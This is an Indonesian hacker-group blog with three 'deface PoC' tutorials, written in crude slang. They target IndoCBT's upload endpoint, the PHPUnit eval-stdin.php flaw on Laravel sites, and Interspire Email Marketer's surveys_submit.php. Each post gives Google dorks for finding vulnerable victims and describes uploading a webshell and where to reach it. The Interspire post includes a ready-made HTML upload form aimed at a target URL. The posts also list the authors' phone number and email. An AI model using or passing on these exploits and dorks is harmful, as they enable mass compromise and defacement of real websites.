Cara Deface Poc IndoCBT

Posted by Mr. Vampire at August 22, 2019 Thursday, August 22, 2019

Cara Deface Poc IndoCBT By D3C

Nih Gua beri tahu bug cbt v11 atau indocbt 2018-2019
Bug cbt v11 atau indocbt 2018 itu bug nya terdapat di http://site.info/aksi/
(Gak Jauh Beda Ama Cbt Beesmart_-)
Intinya lo tambahin exsploitnya yaitu */aksi/* ini hanya berlaku untu cbt versi
11.0 atau indocbt
Dan untuk bugnya lo tinggal tambahin
exploit : */aksi/upload-file.php* jika blank berarti
vuln kalo gak berarti lo gak gans aoakka dan lo tinggal ke csrf online
Untuk post filenya : uploadfile (tergantung bugnya)

Untuk aksesnya lo tinggal ketik :
http://site.info/images/shell or
http://site.info/[dir]/images/shell

Ok itu adalah bug cbt v11 atau indocbt 2018/2019
Dan untuk dorknya
"INDOCBT" inurl:login.php
INDOCBT last update :
"Belajar Online" inurl:login.php
Itu beberapa dork yang gua kembagin selanjutnya lo tinggal kembangin lagi ok
++++++++++++++++++++++++++++++++++
Kalo Ingin Nanya Noh Chat Gua Aja Gan
Wa : 083116774066
Gmail : harigrimorum990@gmail.com
Thanks To - MR.H4R1
                    - MR. BL4CK_H4T10
                    - VMPR7
                    - ALL MEMBER D3C
0 comments

Cara Deface PoC Laravel PhpUnit In Termux

Posted by Mr. Vampire at August 19, 2019 Monday, August 19, 2019

Cara Deface PoC Laravel PhpUnit In Termux
Ok Kembali Lagi Ama Gua Yang Ah Sudah Lah Males Kenal Diri Langsung Tutor Aja
Lah Asu
1.Lo Download Dulu Scriptnya Di Blog Dark 3xploit Cyber atau disini

2.Kalo Dah Kedownload Cari Filenya Goblok

3.Cara Pakai Nya Dengan Ketik
"php phpunit.php your dork"
Dork Laravel PhpUnit :
'inurl:/Util/PHP/ site:.id'
'inurl:/phpunit/phpunit/ site:.com'
'inurl:/vendor/bin/ site:'
'inurl:/vendor/phpunit'
'inurl:/vendor/phpunit/phpunit/src/Util/PHP/ site:.net'
'intitle:"index of" intext:eval-stdin.php site:za'
'inurl:/Util/PHP/ intext:eval-stdin.php site:.com'
[+]Contoh : php phpunit.php inurl:/Util/PHP/ site:.id[+]

4.Tinggal Tunggu Sampai Proses Selesai Cuk...
Nah Kalo Udah Selesai Kalian Bisa Cek Filenya Di Directiory(File Manager) Kalian
yaitu result.txt dan revist.txt
*Note : Result.txt = web vuln + exploit succes
 Revist.txt = web vuln tapi exploit not success (Coba Manual Gan)

5.Tinggal Buka + Copas Url Nya Ke Google Nanti Akan Ada Uploadernya h3h3 Tinggal
lo upload shell atau sc lo
Sekian Dari Gua Tutor Laravel PhpUnit
+++++++++++++++++++++++++++++++++++
Jangan Lupa Contac Gua h3h3
Wa : 083116774066
Gmail : harigrimorum990@gmail.com
Fb : DmZ Hari Grimorum
Thanks To DARK 3XPLOIT CYBER
                    - MR.H4R1
                    - MR.BL4CK_H4T10
                    - VMPR7
                    - ALL MEMBER D3C

6 comments

Cara Deface PoC Intespire Email

Posted by Mr. Vampire at August 18, 2019 Sunday, August 18, 2019
Cara Deface PoC Intespire Email Marketer

1.Lo Doring Dulu Yah Bujank
Nih Dorknya Bgsd
(+)Intile:"Control Panel" + emaiarketer(+)
(+)intitle:Control Panel "Login with your username and password below." +"Email"
+"Powered by"(+)
(+)intext:"Powered by Hairyspire Email Marketer"(+)
(Selebihnya Kemabangin Yah Goblok Jangan Ngemis Mulu Asu)

2.Lo Buat Csrfnya
+++++++++++++++++++++++++++++
<!DOCTYPE HTML>
<html lang="en-US">
<head>
 <meta charset="UTF-8">
 <title></title>
</head>
<body>
<form action="http://targetlo.co.id/surveys_submit.php?formId=990" method="post"
enctype="multipart/form-data">
 <input type="file" name="widget[0][field][][value]">
 <input type="submit" value="submit" name="submit">
</form>
</body>
</html>
++++++++++++++++++++++++++++++
Atau Bisa Download Di Blog Dark 3xploit Cyber disini

3.Exploitnya Asu "surveys_submit.php?formId=990"
*Note: (formid=) angkanya kalian ganti sesuai keinginan kalian jika kalian tidak
suka yah jangan di ganti goblok Kalo gua sukanya 990

4.Cara Memasukan Exploitnya Kek Gini
*http://kontol.co.li/surveys_submit.php?formId=990*
Atau
*http://kontol.co.li/[patch]/surveys_submit.php?formId=990*
*Note : Nah Kalo Blank Itu Vuln Yah Asu Kalo Gak Blank Berarti Lo Harus Cari
Yang Lain Jangan Dia Mulu Goblok

5.Terakhir Tempat Shell Lo
http://coli.co.li/admin/temp/[angka exploit lo]/[angka folder dari angka exploit
lo]/shell lo bujank
Atau
http://coli.co.li/[patch]/admin/temp/[angka exploit lo]/[angka folder dari angka
exploit lo]/shell lo bujank
Contoh:
http://coli.co.li/admin/temp/surveys/990/[angka folder dari exploit
lo]/kontol.php
*Note : Kalo 403 Kalian Bisa Scan Filenya Atau Kalian Bisa Minta Ke Gua file
scannya

Thanks to DARK 3XPLOIT CYBER (D3C)
Contac Gua h3h3
Wa : 083116774066
Gmail : harigrimorum990@gmail.com
Fb : DmZ Hari Grimorum
Sekian Dari Gua Tutor Interspire Email Marketer
Bye - Mr.H4R1
       - Mr.BL4CK_H4T10
       - VMPR7
       - All Member D3C
5 comments